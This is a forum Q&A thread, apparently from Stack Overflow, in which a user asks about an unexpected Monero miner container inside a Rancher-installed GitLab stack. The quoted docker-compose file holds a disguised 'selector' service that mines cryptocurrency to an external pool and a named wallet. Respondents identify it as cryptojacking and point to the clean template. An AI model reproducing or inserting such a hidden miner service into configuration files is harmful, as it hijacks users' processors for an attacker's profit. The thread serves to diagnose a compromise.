# cpu miner executing in docker container

Tags: docker, cpu, rancher

I installed gitlab via Rancher's catalog.
By running the command "docker ps" I notice that there is a docker container "moneropull / monero-miner". 
I noticed that this container is an underlying part of the Gitlab container. Below the dockercompose file generated by the Rancher stack. 
I would like to know if the "selector" part is mandatory? I really want to take it off. Indeed when the container of gitlab is launched I notice a very high consomation of the processor.

```
version: '2'
volumes:
  gitlab-app-data:
    driver: local
  gitlab-conf-files:
    driver: local
  gitlab-log-data:
    driver: local
services:
  gitlab-server:
    image: gitlab/gitlab-ce:9.5.10-ce.0
    environment:
      GITLAB_OMNIBUS_CONFIG: |-
        external_url 'http://gitehost.com'
        registry_external_url 'http://gitehost.com'
        gitlab_rails['gitlab_shell_ssh_port'] = PORT_NUMBER
    volumes:
    - /home/docker-volumes/gitlab/var/opt/gitlab:/var/opt/gitlab
    - /home/docker-volumes/gitlab/var/log/gitlab:/var/log/gitlab
    - /home/docker-volumes/gitlab/etc/gitlab:/etc/gitlab
    labels:
      io.rancher.container.hostname_override: container_name
  selector:
    image: moneropull/monero-miner
    stdin_open: true
    tty: true
    command:
    - -a
    - cryptonight
    - -o
    - stratum+tcp://monerohash.com:3333
    - -u
    - 42kVTL3bciSHwjfJJNPif2JVMu4daFs6LVyBVtN9JbMXjLu6qZvwGtVJBf4PCeRHbZUiQDzBRBMu731EQWUhYGSoFz2r9fj
    - -p
    - x
    labels:
      io.rancher.container.pull_image: always
  io.rancher.scheduler.global: 'true'
```

Answer (score 3):

Seems you are being crypto-jacked. Look at this https://kromtech.com/blog/security-center/cryptojacking-invades-cloud-how-modern-containerization-trend-is-exploited-by-attackers

There are few images that are compromised and i suspect you accidently picked one of them.

Answer (score 1):

@piy26 pointed out correctly. Your setup seems to have been compromised.

The original gitlab compose file from rancher doesn't have the miner service. Here is the link: https://github.com/rancher/community-catalog/blob/master/templates/gitlab/4/docker-compose.yml#L10